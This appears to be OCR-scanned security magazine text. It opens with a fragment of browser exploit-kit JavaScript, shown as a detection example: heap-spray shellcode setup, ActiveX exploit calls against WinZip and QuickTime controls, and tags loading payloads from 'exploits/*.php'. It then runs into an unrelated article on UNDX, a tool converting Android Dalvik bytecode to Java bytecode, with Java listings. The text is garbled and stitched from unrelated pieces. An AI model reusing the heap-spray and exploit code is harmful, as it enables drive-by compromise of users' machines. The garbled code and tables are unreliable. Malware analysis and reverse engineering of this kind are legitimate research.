'\x0a'; while (buf fer . length < 5000)buffer += '\ 
x0a\x0a\x0a\x0a' ; try { try { targetl. 
server = buffer; targetl . initialize () ; 
targetl . send ( ) } catch (e) { target2 . 
server = buffer; target2 . receive () ; } 

} catch (e) { } } if (! success) { var repl = 
"A09AE68F"; document . write ( '<object 
classid="clsid: ' + repl + '-B14D-43ED-B713- 
BA413F034904" id="winzip"x/ob j ect>' ) ; var 
mystring = unescape ( shellco + '%u2038'); var 
hstoaddr = OxOcOcOcOc; var hbsize = 0x400000; 
var spslsize = hbsize - (mystring . length * 2 + 
0x38); var bigb = unescape ("%u" + nop + nop + 
"%u" + nop + nop); while (bigb. length * 2 < 
spslsize) { bigb += bigb } bigb = bigb. 

substring (0, spslsize / 2); hblocks = (hstoaddr 

- 0x400000) / hbsize; var memory = new Array (); 
for (var i = 0; i < hblocks; i ++ ) { 
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memory [i] = bigb + mystring } var test = w ; 
for (i = 1; i < 231; i ++ ) { test += *A' } 

test += "\xOc\xOc\xOc\xOc\xOc\xOc\xOc"; try { 
winzip . CreateNewFolderFromName ( test ) } catch 

(e) { } } if (! success) { try { var test = 

new ActiveXObj ect ( ^QuickTime . QuickTime' ) ; var 
mystring = unescape ( shellco + > %u2037'); var 
hstoaddr = OxOcOcOcOc; var hbsize = 0x400000; 

var spslsize = hbsize - (mystring . length * 2 + 
0x38); var bigb = unescape ("%u" + nop + nop + 

"%u" + nop + nop); while (bigb. length * 2 < 

spslsize) { bigb += bigb } hblocks = 

(hstoaddr - 0x400000) / hbsize; bigb = bigb. 

substring(0, spslsize / 2); var memory = new 

Array () ; for (var i = 0; i < hblocks; i ++ ) { 

memory [i] = bigb + mystring } document, 

write (' <object CLASSID="clsid: 02BF25D5-8C17-4B23- 
BC80-D3488ABDDC6B"Xparam name="src" value="expl 
oits/x7b . php"><param name="autoplay" 
value="true"xparam name="loop" 
value="f alse"xparam name=" controller" 
value="true"x/ob j ect>' ) ; } catch (e) { } } 
if (! success){ var mystring = unescape ( shellco + 

> %u3231'); document . write ( x <html xmlns="http : / / 
www . w3 . org/1 99 9/xhtml"Xob j ect id=target 
classid="CLSID: 8 8d96 9c5-f 192- Ild4-a65f- 
0040963251e5"x/object>' ) ; var spslsize = 
0x400000 - (mystring. length * 2 + 0x38); var 
spsl = unescape ("lu" + nop + nop + "%u" + nop + 
nop) ; while (spsl. length * 2 < spslsize) { 
spsl += spsl } var hblocks = (0x05050505 - 
0x400000) / 0x400000; var memory = new Array (); 
for (i =0; i < hblocks; i ++ ) { memory[i] = 



spsl + mystring } var obj = document. 
getElementByld ( 'target' ). obj ect; try { obj. 
open (new Array (), new Array (), new Array (), new 
Array () , new Array ()) } catch (e) { } try { 
obj. open (new Object (), new Object (), new Object (), 
new Object (), new Object ()) } catch (e) { } 
try { ob j . setRequestHeader (new Object (), 

* ') } catch (e) { } for (i = 0; i < 

11; i ++ ) { try { obj . 

setRequestHeader (new Object () , 0x12345678) } 
catch (e) { } } } if (! success) { document, 

write ( ^ <applet archive="exploits/xl5b .php" 
code="BaaaaBaa . class" width=l height=lxparam 
name="ur 1" value="' + url + * 15"x/applet>' ) ; } 
if (! success){ var mystring = unescape ( shellco + 
*%u3631'); var hstoaddr = 0x04060406; var 
plsize = mystring . length * 2; var hbsize = 
0x400000; var spsl = unescape ("lu" + nop + nop + 
"%u" + nop + nop) ; var spslsize = hbsize - 
(plsize + 0x28); var hblocks = (hstoaddr - 
01000000) / hbsize; while (spsl. length * 2 < 
spslsize) { spsl += spsl; } spsl = spsl. 

substring (0, spslsize / 2); var memory = new 
Array (); for (i =0; i < hblocks; i ++ ) { 
memory [i] = spsl + mystring } document . write ( * 
<style>BODY{CURSOR:url ( "exploits /xl 6b . php" ) }</ 
style>' ) ; } if (success) { document . write ( w ) ; } 
else { document . write ( w ) ; } 

This shows how effective WEPAWET is at detecting exploits that
spread through malware.
Reconstructing Dalvik Applications Using UNDX

By Marc Schonefeld



As a reverse engineer I tend to look into the code that is running
on my mobile device. I come from a JVM background, so I wanted to
know what Dalvik is really about. Additionally, I wanted to learn
yet another bytecode language, so Dalvik attracted my attention
while I was sitting over a boring tax form. As I prefer coding to
doing boring stuff, I skipped the tax declaration and coded the
UNDX tool, which is presented in the following paragraphs.

What is Dalvik 

Dalvik is the runtime that runs userspace Android applications. It
was invented by Dan Bornstein, a very smart engineer at Google, and
he named it after a village in Iceland. Dalvik is register-based and
does not run Java bytecode. It runs its own bytecode dialect, which
is executed by this non-JVM runtime engine; see the comparison in
Table 1.

Table 1: Dalvik vs. JVM

                 Dalvik            JVM
Architecture     Register          Stack
OS-Support       Android           Multiple
RE-Tools         Few               Many
Executables      APK               JAR
Constant-Pool    per Application   per Class



Dalvik Development process 

Dalvik apps are developed using Java developer tools on a standard
desktop system, such as Eclipse (see Figure 1) or the NetBeans IDE.
The developer compiles the sources to Java classes (as with the
javac tool). In the following step he transforms the classes to the
Dalvik executable format (dex) using the dx tool, which results in
the classes.dex file. This file, bundled with meta data (manifest)
and media resources, forms a Dalvik application as an 'apk'
deployment unit. An APK file is transferred to the device or an
emulator, which can happen with adb or, in most end-user cases, as
a download from the Android Market.

Figure 1: Dalvik Development environment



Dalvik runtime libraries 

A Dalvik developer can choose from a wide range of APIs. Some are
known from the Java JDK, and some are Dalvik-specific. Some of the
libraries are shown in Table 2.



Table 2: Dalvik APIs

                 Dalvik   JVM
java.io          Y        Y
java.net         Y        Y
android.*        Y        N
com.google.*     Y        N
javax.swing.*    N        Y
Figure 2: Default development process




Figure 3: Development process with undx 




DALVIK DEVELOPMENT FROM A REVERSE 
ENGINEERING PERSPECTIVE 

Perspectives 

Dalvik applications are available as apk files with no source
included, so you buy or download a pig in a poke. Typical questions
during reverse engineering of Dalvik applications are whether the
application contains malicious code, like ad/spyware, or some
phone-home functionality that sends data via a hidden channel to
the vendor. Additionally, one could ask whether an application or
the libraries it statically imports (in its APK container) have
unpatched security holes, which means that the dex file was
generated from vulnerable Java code. A third reverse engineering
perspective would check whether the code contains copied parts,
which may violate the GPL or other license agreements.



Parsing DEX files 

Design 

The dexdump tool of the Android SDK can perform a complete dump of
dex files, and it is used by UNDX. Table 3 lists the parameters
that influenced the design of the parser. The decision was to use
as much usable information from dexdump as possible; for the rest
we parse the dex file directly. Figure 4 shows useful dexdump
output, which is relatively easy to parse compared to native dex
structures. On the other hand, there are frequent omissions in the
output of dexdump, such as the dump of array data (as in Figure 5).
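To illustrate why dexdump output is easy to consume, here is a minimal sketch of a line parser for "key : value" pairs. The class name DexdumpLines and the sample lines are assumptions made for this illustration; this is not the KeyValue class used inside UNDX, and the exact column layout of dexdump output may differ between SDK versions.

```java
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

// Hypothetical helper for illustration only, not part of UNDX.
final class DexdumpLines {

    /** Splits "key : value" at the first colon; returns null if there is none. */
    static String[] splitKeyValue(String line) {
        int colon = line.indexOf(':');
        if (colon < 0) {
            return null;
        }
        String key = line.substring(0, colon).trim();
        String value = line.substring(colon + 1).trim();
        return new String[] { key, value };
    }

    /** Collects the key/value pairs of a block of lines, stripping single quotes. */
    static Map<String, String> parseBlock(List<String> lines) {
        Map<String, String> result = new LinkedHashMap<>();
        for (String line : lines) {
            String[] kv = splitKeyValue(line);
            if (kv != null) {
                result.put(kv[0], kv[1].replace("'", ""));
            }
        }
        return result;
    }
}
```

Feeding it the lines of one method block yields a map from which name, type and access can be looked up; lines without a colon are simply skipped.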



Table 3: Parsing strategy

                 dexdump                      parsing directly
Speed            Time advantage, do not       Direct access to binary
                 have to write everything     structures (arrays, jump
                 from scratch                 tables)
Control          dexdump has a number of      Immediate fix possible
                 nasty bugs
Available info   Filters a lot                All you can parse



Figure 4: Dexdump output 
Workflow

Dalvik programmers follow a recurring workflow when coding their
applications. In the default setup this involves javac and dx.
There is no way back to Java code once we have compiled the code
(see Figure 2). This differs from the Java development model, where
a decompiler is in the toolbox of every programmer. Our tool UNDX
fills this gap, as shown in Figure 3.

Design choices 

UNDX's main task is to parse dex file structures. So before coding
the tool there was a set of major design questions to be decided.
The first was the degree of reuse in the parsing strategy; the
second was the choice of library for generating Java bytecode.



Figure 5: Dexdump array dump output 
We chose BCEL (http://jakarta.apache.org/bcel/) as the bytecode
backend, as it has very broad functionality (compared to potential
alternatives like ASM and Javassist); however, this preference is
solely based on the author's subjective view and experience with
BCEL. Figure 6, which was taken from the BCEL documentation, shows
the object hierarchy provided by the BCEL classes.



Figure 6: BCEL hierarchy 




Processing Steps 

Figure 7 shows the steps that are necessary to parse 
an APK back into a java bytecode representation. First 
global APK structures are read, then the methods are 
processed. In the end the derived data is written to a 
jar file. 



Figure 7: Processing steps 
Processing of global structures: Processing the global structures
involves extracting the classes.dex file from the APK archive
(which is a zip container) and parsing global structures, such as
preparing constants for later lookup. In detail, this step
transforms APK meta information into the relevant BCEL structures,
for example retrieving the Dalvik string table and storing its
values in a Java constant pool.
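Since an APK is an ordinary zip container, the extraction part of this step needs nothing beyond the standard library. The following is a minimal sketch, assuming the APK is available as a stream; the class and method names are made up for this illustration and are not taken from the UNDX sources. The check for the leading "dex\n" bytes is only a quick sanity test, not a full header validation.

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.UncheckedIOException;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;

// Hypothetical helper for illustration only, not part of UNDX.
final class ApkDexExtractor {

    /** Returns the bytes of the classes.dex entry, or null if the archive has none. */
    static byte[] extractClassesDex(InputStream apk) {
        try (ZipInputStream zip = new ZipInputStream(apk)) {
            ZipEntry entry;
            while ((entry = zip.getNextEntry()) != null) {
                if (entry.getName().equals("classes.dex")) {
                    ByteArrayOutputStream out = new ByteArrayOutputStream();
                    byte[] buf = new byte[8192];
                    int n;
                    while ((n = zip.read(buf)) != -1) {
                        out.write(buf, 0, n);
                    }
                    return out.toByteArray();
                }
            }
            return null;
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    /** Checks for the "dex\n" prefix that starts a dex file. */
    static boolean looksLikeDex(byte[] data) {
        return data != null && data.length >= 4
                && data[0] == 'd' && data[1] == 'e'
                && data[2] == 'x' && data[3] == '\n';
    }
}
```

A caller would typically pass a FileInputStream opened on the apk file and hand the returned byte array to the dex parser.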

Process classes: Transforming the classes involves splitting the
combined meta data of the classes within a dex file into individual
class files. For this purpose we parse the meta data, process the
methods by inspecting the bytecode, and generate BCEL classes once
all necessary meta data is available and all methods of a class are
parsed. The BCEL class object is then ready to be dumped into a
class file as an entry of the output jar file.

Processing class Meta Data: This step includes extracting the meta
data first, then transferring the visibility, class/interface,
classname, subclass information into BCEL fields. The static and
instance fields of each class have to be created, too.
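As an illustration of the visibility transfer, the sketch below turns an access value as printed by dexdump into Java modifiers. It assumes the value looks like "0x0019 (PUBLIC STATIC FINAL)", and it only covers the basic flag bits that Dalvik and the JVM share; the class name and the mask are choices made for this example, not UNDX code.

```java
import java.lang.reflect.Modifier;

// Hypothetical helper for illustration only, not part of UNDX.
final class AccessFlags {

    // Only the basic bits are kept; other bits mean different things
    // for classes, fields and methods and are ignored in this sketch.
    private static final int SHARED_MASK = Modifier.PUBLIC | Modifier.PRIVATE
            | Modifier.PROTECTED | Modifier.STATIC | Modifier.FINAL
            | Modifier.ABSTRACT;

    /** Parses the leading hex number of a value such as "0x0019 (PUBLIC STATIC FINAL)". */
    static int parse(String dexdumpValue) {
        String hex = dexdumpValue.trim().split(" ")[0].substring(2); // drop "0x"
        return Integer.parseInt(hex, 16);
    }

    /** Renders the shared flag bits as Java source modifiers. */
    static String describe(int flags) {
        return Modifier.toString(flags & SHARED_MASK);
    }
}
```

The integer returned by parse is the kind of value that can be handed to a bytecode library as the access flags of the generated class, field or method.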

Process the individual methods: The major work of UNDX is performed
in transferring the Dalvik bytecode back into JVM equivalents. So
first we extract the method meta data, then parse all the
instructions and generate BCEL methods for each Dalvik method. This
includes transforming method meta data to BCEL method structures,
extracting method signatures, setting up local variable tables, and
mapping Dalvik registers to JVM stack positions. A source snippet
for this is shown in Figure 8.
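One way to picture the register mapping is the following sketch. It relies on the fact that Dalvik places the incoming arguments in the last registers of a method frame, while the JVM expects them in the first local variable slots. The class RegisterMapper and its strategy are assumptions for illustration; the mapping that UNDX actually performs may differ.

```java
// Hypothetical helper for illustration only, not part of UNDX.
final class RegisterMapper {
    private final int registers; // total number of registers of the method
    private final int ins;       // number of registers holding incoming arguments

    RegisterMapper(int registers, int ins) {
        if (ins < 0 || ins > registers) {
            throw new IllegalArgumentException("ins must be between 0 and registers");
        }
        this.registers = registers;
        this.ins = ins;
    }

    /** Maps a register name such as "v3" to a JVM local variable index. */
    int toJvmIndex(String register) {
        int r = Integer.parseInt(register.substring(1)); // strip the leading 'v'
        if (r < 0 || r >= registers) {
            throw new IllegalArgumentException("no such register: " + register);
        }
        int firstArg = registers - ins;
        // Argument registers move to the front, all others are shifted behind them.
        return r >= firstArg ? r - firstArg : r + ins;
    }
}
```

For a method with five registers and two incoming arguments, v3 and v4 end up in slots 0 and 1, and v0 to v2 follow in slots 2 to 4.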



Figure 8: Acquire method meta data 

private MethodGen getMethodMeta(ArrayList<String> al, ConstantPoolGen pg,
        String classname) {
    for (String line : al) {
        KeyValue kv = new KeyValue(line.trim());
        String key = kv.getKey();
        String value = kv.getValue();
        if (key.equals(str_TYPE)) type = value.replaceAll("'", "");
        if (key.equals("name")) name = value.replaceAll("'", "");
        if (key.equals("access")) access = value.split(" ")[0].substring(2);
        allfound = (type.length() * name.length() * access.length() != 0);
        if (allfound) break;
    }
    Matcher m = methodtypes.matcher(type);
    boolean n = m.find();
    Type[] rt = Type.getArgumentTypes(type);
    Type t = Type.getReturnType(type);
    int access2 = Integer.parseInt(access, 16);
    MethodGen fg = new MethodGen(access2, t, rt, null, name, classname,
            new InstructionList(), pg);
    return fg;
}
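Figure 8 leaves the splitting of the method type string to BCEL. To show what that step amounts to, here is a stand-alone sketch that splits a descriptor such as "(ILjava/lang/String;[J)V" into argument and return types using only the standard library. The class MethodDescriptor is a hypothetical name, and the code assumes a well-formed descriptor.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical helper for illustration only, not part of UNDX or BCEL.
final class MethodDescriptor {

    /** Returns the argument type descriptors, e.g. [I, Ljava/lang/String;, [J]. */
    static List<String> argumentTypes(String descriptor) {
        int close = descriptor.indexOf(')');
        if (!descriptor.startsWith("(") || close < 0) {
            throw new IllegalArgumentException("not a method descriptor: " + descriptor);
        }
        List<String> args = new ArrayList<>();
        int i = 1;
        while (i < close) {
            int start = i;
            while (descriptor.charAt(i) == '[') {
                i++;                                // skip array dimensions
            }
            if (descriptor.charAt(i) == 'L') {
                i = descriptor.indexOf(';', i);     // class names end at ';'
                if (i < 0 || i > close) {
                    throw new IllegalArgumentException("unterminated class name");
                }
            }
            i++;                                    // consume primitive char or ';'
            args.add(descriptor.substring(start, i));
        }
        return args;
    }

    /** Returns everything after the closing parenthesis, e.g. "V". */
    static String returnType(String descriptor) {
        return descriptor.substring(descriptor.indexOf(')') + 1);
    }
}
```

The list of argument descriptors also tells the translator how many local variable slots the parameters occupy, since J (long) and D (double) take two slots each.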



Generating the Java bytecode instructions: Creating BCEL
instructions from Dalvik instructions is very work-intensive. First
BCEL InstructionLists are created, then NOP proxies are prepared
for every Dalvik instruction to handle forward jump targets. Then,
for every Dalvik instruction, an equivalent JVM bytecode block is
added to the JVM InstructionList. UNDX spends most of its time in
this conversion loop. Not every instruction can be processed
one-to-one, as some storage semantics differ between Dalvik and the
JVM, as shown in Figure 9, Figure 10 and Figure 11.
Figure 9: Transforming the new-array opcode

private static void handle_new_array(String[] ops, InstructionList il,
        ConstantPoolGen cpg, LocalVarContext lvg) {
    String vx = ops[1].replaceAll(",", "");
    String size = ops[2].replaceAll(",", "");
    String type = ops[3].replaceAll(",", "");
    il.append(new ILOAD((short) lvg.didx2jvmidxstr(size)));
    if (type.substring(1).startsWith("L")
            || type.substring(1).startsWith("[")) {
        il.append(new ANEWARRAY(Utils.doAddClass(cpg, type.substring(1))));
    } else {
        il.append(new NEWARRAY((BasicType) Type.getType(type.substring(1))));
    }
    il.append(new ASTORE(lvg.didx2jvmidxstr(vx)));
}

Figure 10: Transforming virtual method calls 

private static void handle_invoke_virtual(String[] regs, String[] ops,
        InstructionList il, ConstantPoolGen cpg, LocalVarContext lvg,
        OpcodeSequence oc, DalvikCodeLine dcl) {
    String classandmethod = ops[2].replaceAll(",", "");
    String params = getparams(regs);
    String a[] = extractClassAndMethod(classandmethod);
    int metref = cpg.addMethodref(Utils.toJavaName(a[0]), a[1], a[2]);
    genParameterByRegs(il, lvg, regs, a, cpg, metref, true);
    il.append(new INVOKEVIRTUAL(metref));
    DalvikCodeLine nextInstr = dcl.getNext();
    // An unused non-void result has to be popped to keep the stack balanced
    if (!nextInstr._opname.startsWith("move-result")
            && !classandmethod.endsWith(")V")) {
        if (classandmethod.endsWith(")J")
                || classandmethod.endsWith(")D")) {
            il.append(new POP2());
        } else {
            il.append(new POP());
        }
    }
}



Figure 11: Transforming sparse switches

String reg = ops[1].replaceAll(",", "");
String reg2 = ops[2].replaceAll(",", "");
DalvikCodeLine dclx = bll.getByLogicalOffset(reg2);
int phys = dclx.getMemPos();
int curpos = dcl.getPos();
int magic = getAPA().getShort(phys);
if (magic != 0x0200) { Utils.stopAndDump("wrong magic"); }
int size = getAPA().getShort(phys + 2);
int[] jumpcases = new int[size];
int[] offsets = new int[size];
InstructionHandle[] ihh = new InstructionHandle[size];
for (int k = 0; k < size; k++) {
    jumpcases[k] = getAPA().getShort(phys + 4 + 4 * k);
    offsets[k] = getAPA().getShort(phys + 4 + 4 * (size + k));
    int newoffset = offsets[k] + curpos;
    String zzzz = Utils.getFourCharHexString(newoffset);
    ihh[k] = ic.get(zzzz);
}
int defaultpos = dcl.getNext().getPos();
String zzzz = Utils.getFourCharHexString(defaultpos);
InstructionHandle theDefault = ic.get(zzzz);
il.append(new ILOAD(locals.didx2jvmidxstr(reg)));
LOOKUPSWITCH ih = new LOOKUPSWITCH(jumpcases, ihh, theDefault);
il.append(ih);
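The payload that the sparse switch listing reads has a simple layout in the dex format: a 16-bit ident of 0x0200, a 16-bit entry count, then all keys followed by all branch targets as 32-bit little-endian values. The following stand-alone sketch decodes such a payload with a ByteBuffer. The class name is hypothetical, and unlike the listing above it reads keys and targets as full 32-bit integers.

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

// Hypothetical helper for illustration only, not part of UNDX.
final class SparseSwitchPayload {
    final int[] keys;    // case values
    final int[] targets; // branch offsets relative to the switch instruction

    private SparseSwitchPayload(int[] keys, int[] targets) {
        this.keys = keys;
        this.targets = targets;
    }

    /** Decodes the payload that starts at the given byte offset. */
    static SparseSwitchPayload parse(byte[] dex, int offset) {
        ByteBuffer buf = ByteBuffer.wrap(dex).order(ByteOrder.LITTLE_ENDIAN);
        int ident = buf.getShort(offset) & 0xFFFF;
        if (ident != 0x0200) {
            throw new IllegalArgumentException(
                    "wrong magic: 0x" + Integer.toHexString(ident));
        }
        int size = buf.getShort(offset + 2) & 0xFFFF;
        int[] keys = new int[size];
        int[] targets = new int[size];
        for (int k = 0; k < size; k++) {
            keys[k] = buf.getInt(offset + 4 + 4 * k);
            targets[k] = buf.getInt(offset + 4 + 4 * (size + k));
        }
        return new SparseSwitchPayload(keys, targets);
    }
}
```

Each target still has to be added to the position of the switch instruction before it can be resolved to a JVM instruction handle, as the listing does with curpos.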



Figure 12: Dalvik Code 
Figure 13: JVM Code

Figure 14: Static Analysis

Figure 15: Decompilation

Figure 16: Graph With DIA




The instructions shown in Figure 12 and Figure 13 illustrate the
transformation results. To achieve this result we have to comply
with some invariant constraints: we have to assign Dalvik registers
to sound JVM stack positions. To violate the JVM verifier as little
as possible, we want to obey the stack balance rule when processing
the opcodes. It is also very important to provide proper type
inference for the object references on the stack (reconstructing
the flow of data assignment opcodes). This is often tricky and
fails in the set of cases where Dalvik reuses registers for objects
of differing types. This detail illustrates well how hardware and
memory constraints in mobile devices influenced the design of the
Dalvik architecture.
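The idea behind the NOP proxies can be shown without BCEL. The sketch below is a simplified model: in a first pass it reserves a label for every Dalvik instruction offset, so that in the second pass a forward jump can refer to an instruction that has not been translated yet. The class names, the pseudo output format and the use of string labels instead of BCEL InstructionHandles are all assumptions made for this illustration.

```java
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

// Hypothetical model for illustration only, not part of UNDX.
final class JumpPlaceholders {

    /** One Dalvik instruction: offset, mnemonic and jump target (-1 if none). */
    static final class DalvikInsn {
        final int offset;
        final String op;
        final int target;

        DalvikInsn(int offset, String op, int target) {
            this.offset = offset;
            this.op = op;
            this.target = target;
        }
    }

    /** Emits one pseudo line per instruction with jump targets resolved to labels. */
    static List<String> translate(List<DalvikInsn> code) {
        // Pass 1: reserve a placeholder label for every instruction offset.
        Map<Integer, String> proxies = new LinkedHashMap<>();
        for (DalvikInsn insn : code) {
            proxies.put(insn.offset, "L" + String.format("%04x", insn.offset));
        }
        // Pass 2: emit each instruction behind its placeholder and look up targets.
        List<String> out = new ArrayList<>();
        for (DalvikInsn insn : code) {
            String line = proxies.get(insn.offset) + ": nop; " + insn.op;
            if (insn.target >= 0) {
                String label = proxies.get(insn.target);
                if (label == null) {
                    throw new IllegalStateException("unknown jump target: " + insn.target);
                }
                line += " -> " + label;
            }
            out.add(line);
        }
        return out;
    }
}
```

Because every offset already has a placeholder before any instruction is translated, forward and backward jumps are handled by the same lookup.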

Store generated data in BCEL structures: After all methods in all
classes are parsed, processing is finished, and as a result we have
a class file for each class defined in the dex file.

Static analysis of the code 

Now that we have bytecode generated from the Dalvik code, what can
we do with it? We could analyze the code with static checking tools
such as FindBugs to find programming bugs, vulnerabilities and
license violations with tool support (see Figure 14). If we are
experienced reverse engineers and have already learned that fully
automated tools are not the ultimate choice in RE, we stuff the
class files into a decompiler (JAD, JD-GUI; see Figure 15) to
receive Java-like code that speeds up program understanding, which
is the reverse engineer's primary goal. Be aware that you receive a
structural equivalent and not a 100 percent verbatim copy of the
original source, as the heavy transformation processes in between
leave their mark, such as the reuse of stack variables.

In certain cases it is recommended to use a class file disassembler
(javap), namely when the decompiler was not able to complete due to
heavy use of obfuscation.

Although real reverse engineers prefer code, UNDX can also compete
in the RE softball league, using more graphs and consuming less
brain. If you want that instead, write a 20-line Groovy script and
transfer the nodes and arrows of the control flow graph (like the
one offered by FindBugs) into a nice graph in the graphing language
of your choice. Figure 16 shows that approach using DIA.
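As a rough idea of how small such a script can be, here is a sketch in Java rather than Groovy that writes control flow edges in the Graphviz DOT language instead of the DIA format used for Figure 16. The edge list is assumed to be already extracted from the analysis tool; how to obtain it is not shown, and the class name is hypothetical.

```java
// Hypothetical helper for illustration only, not part of UNDX.
final class CfgToDot {

    /** Renders edges given as {from, to} basic block numbers as a DOT digraph. */
    static String toDot(String name, int[][] edges) {
        StringBuilder sb = new StringBuilder();
        sb.append("digraph ").append(name).append(" {\n");
        for (int[] e : edges) {
            sb.append("  b").append(e[0]).append(" -> b").append(e[1]).append(";\n");
        }
        sb.append("}\n");
        return sb.toString();
    }
}
```

The resulting text can be saved to a file and rendered with any tool that understands DOT.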



SUMMARY AND TRIVIA 

UNDX consists of about 4000 lines of code written in Java; the only
external dependency is BCEL. It uses the command line only, but you
could write a GUI and contribute it to the project, as the
licensing is committer-friendly GPL. The code is available at
http://www.illegalaccess.org/undx/.

At this point we thank Dan Bornstein (again) for suggesting the
UNDX name.